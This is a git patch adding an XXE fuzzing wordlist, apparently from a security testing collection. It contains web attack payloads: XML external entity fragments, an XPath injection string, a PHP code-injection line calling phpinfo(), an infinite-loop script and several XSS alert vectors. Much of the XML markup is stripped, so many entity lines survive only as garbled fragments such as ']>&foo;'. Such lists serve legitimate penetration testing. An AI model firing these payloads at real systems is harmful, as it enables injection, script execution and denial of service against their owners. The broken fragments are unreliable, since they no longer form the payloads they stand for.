From 1d1030ec288b844ff514fe5135e705b799700501 Mon Sep 17 00:00:00 2001 From: Jason Haddix Date: Fri, 27 Nov 2015 15:51:45 -0800 Subject: [PATCH] Create XXE_Fuzzing.txt --- Fuzzing/XXE_Fuzzing.txt | 46 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 Fuzzing/XXE_Fuzzing.txt diff --git a/Fuzzing/XXE_Fuzzing.txt b/Fuzzing/XXE_Fuzzing.txt new file mode 100644 index 0000000..b9a1d43 --- /dev/null +++ b/Fuzzing/XXE_Fuzzing.txt @@ -0,0 +1,46 @@ +# XXE_Fuzzing List + + +]> +]>&foo; +]> +]>&foo; + +]>&xxe; +]> +]>&xxe; +]> +]>&xxe; +]> +]>&xxe; +]> +]> +]>&xxe; + +]]> +&foo; +%foo; +count(/child::node()) +x' or name()='username' or 'x'='y +','')); phpinfo(); exit;/* +var n=0;while(true){n++;}]]> +SCRIPT]]>alert('XSS');/SCRIPT]]> +SCRIPT]]>alert('XSS');/SCRIPT]]> +SCRIPT]]>alert('XSS');/SCRIPT]]> + + +]]> +<IMG SRC="javascript:alert('XSS')"> + + + +XSS + + + + +]> +]> +]> +]> +]>